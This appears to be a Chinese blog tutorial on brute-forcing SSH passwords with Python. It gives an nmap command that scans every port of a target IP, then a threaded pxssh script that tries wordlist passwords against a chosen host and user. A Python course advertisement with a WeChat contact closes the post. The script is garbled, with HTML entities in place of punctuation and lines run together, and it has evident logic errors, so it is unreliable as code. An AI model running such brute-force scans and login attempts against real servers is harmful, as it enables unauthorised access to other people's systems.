服务器暴力破解的程序(python开发）

如果您对服务器暴力破解和Python相关知识有兴趣&＃xff0c;与大神们共同探讨和

首先我们看一下基本的原理以及过程

Paste_Image.png

我们看一下准备工作:

我们需要获取目标机器的IP和SHH端口 ssh端口是可以改变的&＃xff0c;所以我们需要去扫描机器的正确的ssh端口。我们使用nmap工具去扫描&＃xff0c;使用下面这条命令就可以目标机器上面存在的所有的端口以及服务的名称和使用软件的版本号&＃xff1a;

Nmap -v -p 1-65535 -sV -O -sS -T4 192.168.1.110&＃xff08;目标机器&＃xff09;

Paste_Image.png

大家可以看到我们的ssh端口是我们的12784。ssh版本是5.3

现在我们以及获取到我们需要的信息了 IP:192.168.1.110 PORT:12784

我们可以开始破解了。

Paste_Image.png

大家可以看到password Found: vagrant这个就是我们的目标机器的密码&＃xff1a;

#python pexpect pxssh远程登录 login()方法可以帮助我们去登录目标机器from pexpect import pxsshimport optparse #处理我们命令行参数的模块from threading import * #多线程 高并发 可以同时登录多个密码import timemaxConnections &＃61; 5 #执行最大线程数 可以修改#把maxConnection绑定到我们BoundedSemaphore方法 赋值给connection对象connection_lock &＃61; BoundedSemaphore(value&＃61;maxConnections)Found &＃61; False #设置一个初始化值 false后面会用到Failes &＃61; 0 #设置一个初始化值为0def connect(host, user, password, ports, release): #传了5个变量进去 global Found global Failes try: s &＃61; pxssh.pxssh() #把方法绑定到对象s 方便调用 s.login(host,user,password,ports) #调用我们的pxssh.login方法并把参数传进去 print &＃39;[&＃43;] Password Found:&＃39; &＃43;password #打印匹配到的密码 Found &＃61; True #如果等于true就结束 except Exception, e: if &＃39;read_nonblocking&＃39; in str(e): #这个字符串表示主机连接次数过多,ssh不对外提供服务 Failes &＃43;&＃61; 1 time.sleep(5) #休息5秒 connect(host,user,password,False) #重新调用connect函数 finally: if release: connection_lock.release()def main(): parser &＃61; optparse.OptionParser("usage%prog -H -u -F -P ") #创建一个对象parser绑定一个帮助信息 自动生成 parser.add_option(&＃39;-H&＃39;, dest&＃61;&＃39;tgtHost&＃39;, type&＃61;&＃39;string&＃39;, help&＃61;&＃39;specify target host&＃39;) parser.add_option(&＃39;-u&＃39;, dest&＃61;&＃39;user&＃39;, type&＃61;&＃39;string&＃39;, help&＃61;&＃39;specify target user&＃39;) parser.add_option(&＃39;-F&＃39;, dest&＃61;&＃39;passwdFile&＃39;, type&＃61;&＃39;string&＃39;, help&＃61;&＃39;specify target password file&＃39;) parser.add_option(&＃39;-P&＃39;, dest&＃61;&＃39;ports&＃39;, type&＃61;&＃39;string&＃39;, help&＃61;&＃39;specify target ports&＃39;) #当我们输入-p之后会把参数赋值给ports (options, args)&＃61;parser.parse_args() host &＃61; options.tgtHost user &＃61; options.user passwdFiles &＃61; options.passwdFile host &＃61; options.passwdFile ports &＃61; options.ports if (host&＃61;&＃61;None) | (user&＃61;&＃61;None) | (passwdFiles&＃61;&＃61;None) | (ports&＃61;&＃61;None): #判断获取的值是否为空&＃xff0c;如果有一个为空就打印帮助信息 print parser.usage #打印帮助信息 exit() fn &＃61; open(passwdFiles,&＃39;r&＃39;) #使用open方法打开文件并绑定到fn这个对象 for line in fn.readline(): if Found: print "[*] exiting: password Found" exit() if Failes > 5: print "[!]exiting: Too many socket timeouts" exit() connection_lock.acquire() #锁定 password &＃61; line.strip(&＃39;\r\n&＃39;) print "[-] Testing: " &＃43;str(password) t &＃61; Thread(target &＃61; connect(), args&＃61;(host, user, password, ports, True)) #启动多线程&＃xff0c;并传入方法connet函数 args是函数的参数if __name__ &＃61;&＃61; &＃39;__main__&＃39;: main()

如果你符合下面的情况中的任意一条&＃xff0c;那我十分建议你加入跟着一起学习

1.准备从事编程工作&＃xff0c;但是不知道选择什么语言好

2.只掌握了Python基础&＃xff0c;缺乏系统性的学习以及企业级项目实战&＃xff0c;达不到求职的能力

3.有一定Python基础&＃xff0c;但是求职屡屡碰壁&＃xff0c;各种问题频繁暴露&＃xff0c;甚至怀疑自己不适合做开发

4.准备转行从事开发的同学

5.年满18即可

6.想利用Python副业月入3000-80000

****扫码二维码领取Python学习试学课程&＃43;课程咨询&＃xff01;

领取福利加小姐姐微信&＃xff1a;SX77661

免费领取学习&＃43;课程规划